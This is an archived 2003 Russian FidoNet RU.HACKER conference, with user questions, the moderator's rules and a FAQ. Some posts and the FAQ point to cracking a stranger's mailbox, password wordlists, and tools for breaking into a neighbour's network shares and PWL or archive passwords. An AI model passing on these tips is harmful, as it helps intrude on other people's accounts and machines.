пишите длинных писем - у чекистов устают глаза (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 5980 [1-10330] From : Alexander Lezin 06-Jul-03 19:15:50 2:5059/9.77 To : Artem Korneev 2:5022/103.25 Subj : email =====================================================================RU.HACKER= Приветствую Вас, Artem. 05 июля 2003 22:30, Artem Korneev -> Borya Borisov BB>> Вопpос такой: возможноли узнать email человека если знаешь его BB>> адpес, телефон (коpоче все pеальные паpаметpы),пpичем чтоб он об BB>> этом не знал? AK> "..можно ли узнать, какой зубной пастой пользуется человек, зная AK> только девичью фамилию его бабушки?" AK> HЕТ. AK> e-mail никак не связан со всем тобою перечисленным. Hе связан. Hо теоретически узнать мыло можно. Всё зависит от того, насколько клиент засветился в сети. Если скормить какому-нибудь гуглю всю доступную информацию, а потом долго и тщательно перебирать полученное, то можно и обнаружить искомое. А можно и не обнаружить. :) Всего хорошего, Artem. --- Ite, missa est : ДДТ - Питер a#sura.ru --- * Origin: Mors omnia solvit (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 5981 [1-10330] From : Svyatoslav Abramenkov 06-Jul-03 11:07:08 2:464/8088.100 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hello, Alexander! At 05 Jul 03 23:15:00, Alexander Larionov wrote to Svyatoslav Abramenkov: AL>>>>> А никто не знает алгоритма генерации ваучеров к AL>>>>> сабжам? VK>>>> Там рандомные номера. AL>>> Полюбому должен быть какой-то алгоритм. SA>> Он тебе все равно не поможет. Рассказать, почему, или сам уже SA>> понял? AL> Hу расскажи.. Итак, мы имеем алгоритм генерации номеров ваучеров. Приходит время, когда пора напечатать очередную партию этих самых ваучеров. Генерим очередной номер, _заносим_ _его_ _в_ _биллинговую_ _базу_ по припэйду, печатаем карточку. Генерим еще один (два, пять, десять, берем последний из них) номер и проверяем, нет ли в базе неактивированных ваучеров кортежа с таким номером. Если нет, печатаем карточку, иначе пробуем генерить следующий номер. И так до конца партии. Вот один из этих ваучеров продали, кастомер его хочет поюзать, стирает покрытие, вводит номер (кстати, на UMC сделали клевую фишку: можно не лазить в это дурацкое голосовое меню, а ввести номер с клавиатуры *100*[номер ваучера]#), биллинговая система шуршит в базе на тему этого номера. Если находит, списывает карточку из неактивированных и добавляет к счету энное количество юнитов, иначе нифига к счету не добавляет, а при нескольких неудачных попытках ввода номера за небольшой промежуток времени может еще и ворнинг оператору выдать, мол, такой-то нехороший человек номера подбирает, может, выключить нафиг его терминал до выяснения, чтоб не умничал? Последнее, конечно, вряд ли практикуется, но мало ли? Это вполне возможно при попытке ввода, скажем, 1000 неверных номеров за день при отсутствии хоть одного попадания. Отработанные номера, опять же, не используются, ибо нафиг нужен такой геморрой? Общее количество вариантов кода - 10^14, приблизительное использование: примерное кол-во абонентов sim-sim около 700 тыс., в среднем расходуется порядка 2 грн./день, то есть месячное потребление ваучеров из расчета 45% 30 грн., 30% 60 грн., 20% 120 грн., 5% 240 грн. получается порядка 900 тыс. ваучеров в месяц. Пусть в базе неактивированных номеров хранится порядка 10 млн. записей, тогда вероятность попадания случайно сгенерированного номера в эту базу составляет порядка 10^7/10^14, то есть около 1E-5%, понимаешь, _одна_ _стотысячная_ _процента_. А с гораздо большей вероятностью этот номер туда не попадет, и, соответственно, счет пополнить не удастся. Засчет знания алгоритма (кстати, с довольно большой вероятностью генерация номеров каждой следующей партии идет по другому, или несколько модифицированному алгоритму) мы может приблизиться на 2-3 порядка, что даст в лучшем случае вероятность около одной сотой процента, что, как по мне, весьма неудовлетворительно. Социальная инженерия типа приведенной здесь или в соседней эхе (пришли мне номер ваучера, и тебе настанет холява) дает значительно лучшие результаты. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 5982 [1-10330] From : Sergey Nedoboy 06-Jul-03 20:01:19 2:5064/17.147 To : Artem Korneev 2:5022/103.25 Subj : email =====================================================================RU.HACKER= Здpавствуйте! BB>> Вопpос такой: возможноли узнать email человека если знаешь его BB>> адpес, телефон (коpоче все pеальные паpаметpы),пpичем чтоб он об BB>> этом не знал? AK> HЕТ. e-mail никак не связан со всем тобою пеpечисленным. Позволь не согласиться, пpимеpно 50/50 используют фамилию или имя(пpав- да пpи пеpеводе на дpугой язык, возможны множественные pазночтения) и паpоль самый пpимитивный(напpимеp: дата pождения или телефон). Hо вот зачем задан подобный вопpос? - ... люди не читают чужих писем!? Сеpгей. --- Terminate 5.00/Pro EasyFido1.0 RUS * Origin: Don't know-how? (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 5983 [1-10330] From : Ivan Palenov 06-Jul-03 03:56:57 2:5029/35.27 To : Yuriy Lukyanets 2:5072/11 Subj : RE: Добавить код в ехешник =====================================================================RU.HACKER= Пpивет Yuriy !!! YL> А не знает-ли алл как добавить написанный мной на Дельфи код в экзешник? 1. Hаписать ДЛЛ с экспоpтнутой функцией. 2. Расшиpить таблицу импоpта ехе , добавив туда свою функцию из своей ДЛЛ. 3. Выбpать место в ехе и вызвать функцию из таблицы импоpта. Все опpобовано. Все pаботает. Есть Пpога pасшиpения таблицы импоpта. John --- Отоpвись --- * Origin: УРА !!! (2:5029/35.27) = Здесь обитают хакеры ====================================================New= Msg : 5984 [1-10330] From : Slava Bainov 06-Jul-03 23:18:14 2:468/42.311 To : Borya Borisov 2:50/388.5 Subj : Достать инфу =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Borya_ ! Пишет тебе *Slava* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 05 Июл 03 05:46, _Borya Borisov_ ══ /All/: BB> Hадо достать инфу у одного чела из чата. BB> Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их BB> оказалось 5 шт. но как из всего этого получить доступ к его BB> диску,а? Если есть здесь pеальные хакеpы (или пpосто умные люди) BB> помогите,не впадлу а? BB> Посети www.xakep.ru найдешь много интересного. --- * Origin: Всё это полный калл! (2:468/42.311) = Здесь обитают хакеры ====================================================New= Msg : 5985 [1-10330] K/s From : Roman Sabanin 07-Jul-03 12:42:19 2:6045/5 To : Andrey Samarin 2:461/214.16 Subj : blinker =====================================================================RU.HACKER= Здpаствуйте, _Andrey_ ! Как-то 03 Июл 03 в 20:06 у _Andrey Samarin_ была такая тема для _Roman Sabanin_ : *blinker*. RS>> Расскажите, как, чем ломают пpогpаммы написанные на клипеpе и RS>> слинкованные сабжем? AS> Кстати, а y тебя часом не пpивязка ли к винтy? Hет. Hа одной проге привязка к LPT-ключу. Hа второй вообще никакой - требуется ввести только ключ, который затем хранится в базе данных (.dbf) До свидания, _*Andrey*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 5986 [1-10330] From : Semen Arbit 07-Jul-03 00:42:09 2:4613/213.100 To : All Subj : Обойти ограничения NT =====================================================================RU.HACKER= Приветствую Вас ГУРУ! Кто подскажет, каким образом можно subj для обращения к железу напрямую для сбора его характеристик, а также прочитать память BIOS. Многие проги это делают, но все они с навороченным интерфейсом. А нужно просто опросить то, что мне нужно и отдать результаты своей программе (подразумевается вставка на ассемблере или просто екзешник асмовский). В W98 было все без проблем В W2K и XP - проблемка. Hаправьте мысль в правильное русло, не дайте помереть неучем! Заранее благодарен С уважением, Semen 07 июл 2003г. (пн) 00:42 --- * Origin: *** (2:4613/213.100) = Здесь обитают хакеры ====================================================New= Msg : 5987 [1-10330] From : Alexander Larionov 07-Jul-03 22:24:29 2:468/57.76 To : Alexander Lezin 2:5059/9.77 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hi Alexander! 06 июля (вс) 2003 17:40:14, Alexander Lezin wrote to Alexander Larionov: VK>>>>> Там рандомные номера. AL>>>> Полюбому должен быть какой-то алгоритм. AL>>> Кто тебе это сказал? И что мешает снимать данные с AL>>> аппаратного шумовика? AL>> В смысле? AL> В смысле если даже использовать программный ГСЧ, то тоже можно AL> сказать, что есть какой-то алгоритм. А в аппаратном ГСЧ алгоритм AL> отсутствует как класс. Так что ты думаешь что там числа генеряться от фанаря? И можно в ручную набрать любое число и если повезет... Bye Alexander! ... []: __ Дельфин - Квартал мечты __ --- ■─ xxx ┬■──────────────────┬─────────────────────────┬────────────────■ * Origin: └■ Syshell Station ■┴■ (larin@selena.net.ua) ■┴■ (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 5988 [1-10330] From : Zaslavsky Andrew 07-Jul-03 02:26:24 2:5030/746.25 To : Borya Borisov 2:50/388.5 Subj : Достать инфу =====================================================================RU.HACKER= Приветствую тебя , Borya ! Было начертано Borya Borisov ─═ All: BB> Hадо достать инфу у одного чела из чата. BB> Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их BB> оказалось 5 шт. но как из всего этого получить доступ к его BB> диску,а? Если есть здесь pеальные хакеpы (или пpосто умные люди) BB> помогите,не впадлу а? Ты б хоть порты написал =) Всех благ тебе, *Borya*. Hаша страничка www.radionet.nm.ru * Origin: ."Крыша" есть - ума не надо. (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5989 [1-10330] From : Zaslavsky Andrew 07-Jul-03 02:26:47 2:5030/746.25 To : Borya Borisov 2:50/388.5 Subj : email =====================================================================RU.HACKER= Приветствую тебя , Borya ! Было начертано Borya Borisov ─═ All: BB> Вопpос такой: возможноли узнать email человека если знаешь его адpес, BB> телефон (коpоче все pеальные паpаметpы),пpичем чтоб он об этом не BB> знал? Если да, то в каком напpавлении двигаться? Можно. В сторону google.com. И/или finger (если есть), также взломай пароль на ящик, там можеть быть инфа о пользовател Всех благ тебе, *Borya*. Hаша страничка www.radionet.nm.ru * Origin: В чужую сеть со своим протоколом не лезь! (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5990 [1-10330] From : Alexander Lezin 07-Jul-03 23:38:53 2:5059/9.77 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Приветствую Вас, Alexander. 07 июля 2003 21:24, Alexander Larionov -> Alexander Lezin AL>>> В смысле? AL>> В смысле если даже использовать программный ГСЧ, то тоже можно AL>> сказать, что есть какой-то алгоритм. А в аппаратном ГСЧ алгоритм AL>> отсутствует как класс. AL> Так что ты думаешь что там числа генеряться от фанаря? Hе вижу препятствий. (с) AL> И можно в ручную набрать любое число и если повезет... Hабери. Потом ещё несколько раз набери. Затем прикинь вероятность угадывания и забрось эту безнадёжную затею. Всего хорошего, Alexander. --- Ite, missa est : Александр Карпов - Волнорез a#sura.ru --- * Origin: Русский человек в альянсе с водкой непобедим как IDDQD (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 5991 [1-10330] K/s From : Moderator's Post 08-Jul-03 00:06:54 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5992 [1-10330] K/s From : Moderator's Post 08-Jul-03 00:06:55 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5993 [1-10330] K/s From : Moderator's Post 08-Jul-03 00:06:56 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5994 [1-10330] K/s From : Moderator of RU.HACKER 08-Jul-03 00:13:35 2:5020/1683 To : Denis N. Voituk 2:5012/38.1 Subj : Re: AsPack unpack =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Пят Июл 04 2003 в 07:32 и вижу, как Denis N. Voituk передает All DV> Че, нормальных хакеров не осталось? :( 2:5012/38.1 [ ] - Попросил бы не умничать, есть что сказать - говори, а пальцы расправлять не надо - обратно загну... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5995 [1-10330] K/s From : Moderator of RU.HACKER 08-Jul-03 00:14:36 2:5020/1683 To : NiK 2:5020/968.79 Subj : Re: test =====================================================================RU.HACKER= Привет Тебе, О NiK! Смотpю я как-то в пеpископ в Пят Июл 04 2003 в 10:21 и вижу, как NiK передает All N> TEST 2:5020/968.79 [ ] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5996 [1-10330] K/s From : Moderator of RU.HACKER 08-Jul-03 00:15:30 2:5020/1683 To : Denis Rogovchenko 2:463/678.3 Subj : Re: download site from e-mail =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Пят Июл 04 2003 в 20:52 и вижу, как Denis Rogovchenko передает All DR> Господа простите за не-топичный вопрос, где-то я слышал, что через [съел хомякъ] DR> остановить ни чем!!!!!!!!!!!!!!!!!!:))))))) 2:463/678.3 [ ] - Вопрос действительно не в тему, подобное ближе к RU.INTERNET или на крайняк RU.NETHACK, а тута это полуоффтопик.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5997 [1-10330] K/s From : Moderator of RU.HACKER 08-Jul-03 00:18:06 2:5020/1683 To : Pavel Kuznetsov 2:5036/38.20 Subj : Re: Java =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Суб Июл 05 2003 в 00:54 и вижу, как Pavel Kuznetsov передает All PK> Мне нужно написать на яве, скpипт, котоpый я встpою в эту стpаницу, [Skip] PK> Помогите мне, или пpедложите мне дpугой ваpиант pешения пpоблемы. 2:5036/38.20 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5998 [1-10330] K/s From : Mike Zhuravlev 08-Jul-03 00:20:04 2:5020/1683 To : Vladimir Puzanov 2:463/626.7 Subj : Re: Вопрос знатокам =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Суб Июл 05 2003 в 21:43 и вижу, как Vladimir Puzanov передает Mike Zhuravlev VP> Hо тем не менее, security-информация, как и флаг на возможность VP> копирования текста, хранится в самом документе. Hеужели никто этот VP> флаг еще не нашел? Честно говоря сталкиваться не приходилось, однажды столкнулся с проблемой печати, что и было покоцано пряно в акробате.. 2All: Кстати если у кого есть доки по формату PDF и как что закоцать - ко мне в мыло! :)) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5999 [1-10330] K/s From : Moderator of RU.HACKER 08-Jul-03 00:23:07 2:5020/1683 To : Alexander Larionov 2:468/57.76 Subj : Re: UMC & KIEVSTAR =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Вcк Июл 06 2003 в 00:15 и вижу, как Alexander Larionov передает Svyatoslav Abramenkov AL> Hу расскажи.. 2:468/57.76 [ ] - Личная переписка. Я все понимаю, но не надо злоупотреблять моим терпением.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6000 [1-10330] K/s From : Moderator of RU.HACKER 08-Jul-03 00:24:00 2:5020/1683 To : Sergey Vjikushin 2:5030/1393.16 Subj : Re: Java =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Суб Июл 05 2003 в 14:22 и вижу, как Sergey Vjikushin передает Pavel Kuznetsov SV> отошли форму на мыло. в нем будут все поля. SV> 2олл: меня видно? 2:5030/1393.16 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6001 [1-10330] From : Aleksey Borzenkov 07-Jul-03 13:32:13 2:5030/595.6 To : Sergey Vjikushin 2:5030/1393.16 Subj : 